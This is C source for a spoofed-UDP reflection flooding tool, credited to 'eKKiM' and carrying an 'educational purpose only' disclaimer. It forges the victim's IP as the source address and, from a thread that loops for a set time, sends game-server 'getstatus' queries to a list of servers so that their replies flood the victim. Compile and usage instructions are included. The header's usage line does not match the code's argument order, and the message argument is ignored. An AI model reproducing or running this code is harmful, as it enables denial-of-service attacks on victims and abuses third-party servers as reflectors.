Spoofed UDP

1. /*
2.     Spoofed UDP by eKKiM
3.     Educational purpose only please.
4.     --Note by MFJC--
5.     Compile:
6.         apt-get update
7.         apt-get install gcc
8.         gcc udp.c -pthread
9.     Usage: ./a.out ip port time ipfile.txt message
10. */
11. #include <stdio.h>
12. #include <stdlib.h>
13. #include <netinet/tcp.h>
14. #include <netinet/udp.h>
15. #include <netinet/ip.h>
16. #include <pthread.h>
17.  
18. void D(char *message)
19. {
20.     printf(message);
21.     fflush(stdout);
22. }
23.  
24. typedef struct file_list
25. {
26.     unsigned long ip;
27.     int port;
28. };
29.  
30. typedef struct pthread_param
31. {
32.     unsigned long victim_ip;
33.     int victim_port;
34.     struct file_list *list;
35.     int list_size;
36.     char *message;
37. };
38.  
39. typedef struct pseudo_header
40. {
41.     unsigned int source_address;
42.     unsigned int dest_address;
43.     unsigned char placeholder;
44.     unsigned char protocol;
45.     unsigned short tcp_length;
46.     struct tcphdr tcp;
47. };
48.  
49. void attack(unsigned long srcip, int srcport, unsigned long destip, int destport, char *message)
50. {
51.     int s = socket (PF_INET, SOCK_RAW, IPPROTO_UDP);
52.     char packet[4096];
53.     struct iphdr *iph = (struct iphdr *) packet;
54.     // struct tcphdr *tcph = (struct tcphdr *) (packet + sizeof (struct ip));
55.     struct udphdr *udph = (struct udphdr *) (packet + sizeof(struct ip));
56.     struct sockaddr_in sin;
57.     struct pseudo_header psh;
58.  
59.     sin.sin_family = AF_INET;
60.     sin.sin_port = htons(destport);
61.     sin.sin_addr.s_addr = destip;
62.  
63.     memset (packet, 0, 4096);
64.  
65.     iph->ihl = 5;
66.     iph->version = 4;
67.     iph->tos = 16;
68.     iph->tot_len = sizeof (struct ip) + sizeof (struct udphdr) + strlen(message);
69.     iph->id = htonl (54321);
70.     iph->frag_off = 0;
71.     iph->ttl = 255;
72.     iph->protocol = IPPROTO_UDP;
73.     iph->check = 0;
74.     iph->saddr = srcip;
75.     iph->daddr = sin.sin_addr.s_addr;
76.  
77.     udph->source = htons(srcport);
78.     // Destination port number
79.     udph->dest = htons(destport);
80.     udph->len = htons(sizeof(struct udphdr));
81.     udph->check = 0; //Kernel fill this in?
82.    
83.     strncpy((char *)udph + sizeof (struct udphdr),message, 4096 - (sizeof (struct udphdr) + sizeof (struct ip)));
84.    
85.     //IP_HDRINCL needed for own headers
86.     int one = 1;
87.     const int *val = &one;
88.     if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
89.     {
90.         printf ("[x] Cannot set socket options (are we r00t?)\n");
91.         return;
92.     }
93.  
94.     if (sendto (s, packet, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof (sin)) < 0)
95.         printf ("[x] Error sending packet\n");
96.  
97.     close(s);
98.     return;
99. }
100.  
101. void *thread_attack(void *thread_params)
102. {
103.     struct pthread_param *params = thread_params;
104.     int i;
105.    
106.     while (1)
107.         for (i = 0; i < params->list_size; i++)
108.             attack(params->victim_ip, rand() % 65534 + 1, params->list[i].ip, params->list[i].port, params->message);
109.             // Hmm should we use random port or params->victim_port?
110. }
111.  
112. char *getLine(FILE *f)
113. {
114.     char *buffer = malloc(sizeof(char));
115.     int pos = 0;
116.     char c;
117.  
118.     do { // read one line
119.         c = fgetc(f);
120.         if(c != EOF) buffer[pos++] = (char)c;
121.         buffer = (char*)realloc(buffer, sizeof(char) * (pos + 2));
122.     } while (c != EOF && c != '\n');
123.    
124.     return buffer;
125. }
126.  
127. int main (int argc, char *argv[])
128. {
129.     struct file_list *list = NULL;
130.     int list_size = 0;
131.    
132.     struct pthread_param param;
133.     pthread_t udp_attack;
134.    
135.     printf("Spoofed UDP Attack\n");
136.     printf("          by eKKiM\n");
137.     printf("          for Orgy\n\n");
138.    
139.     if (argc != 6)
140.     {
141.         printf("Usage: %s <destip> <destport> <ip_file_list> <time in seconds> <message>\n", argv[0]);
142.         return -1;
143.     }
144.    
145.     srand(time(0));
146.    
147.     FILE *pFile = fopen(argv[3], "r");
148.     if (pFile == NULL)
149.     {
150.         printf("[X] Cannot open file\n");
151.         return -1;
152.     }
153.    
154.     while (!feof(pFile))
155.     {
156.         char *line;
157.         line = getLine(pFile);
158.         char ip[1024];
159.         int port;
160.  
161.         if (sscanf(line, "%99[^:]:%99d", ip, &port) == 2)
162.         {
163.             list_size++;
164.             list = (struct file_list *) realloc(list, sizeof(struct file_list) * list_size);
165.             list[list_size - 1].ip = inet_addr(ip);
166.             list[list_size - 1].port = port;
167.         }
168.         free(line);
169.     }
170.    
171.     fclose(pFile);
172.    
173.     param.victim_ip = inet_addr(argv[1]);
174.     param.victim_port = atoi(argv[2]);
175.    
176.     param.list = list;
177.     param.list_size = list_size;
178.    
179.     param.message = "\xFF\xFF\xFF\xFF\x67\x65\x74\x73\x74\x61\x74\x75\x73\x10";
180.  
181.     pthread_create( &udp_attack, NULL, thread_attack, (void*) &param);
182.    
183.     printf("[*] Attacking..\n");
184.     sleep(atoi(argv[4]));
185.     printf("[!] Done\n");
186.     return 0;
187. }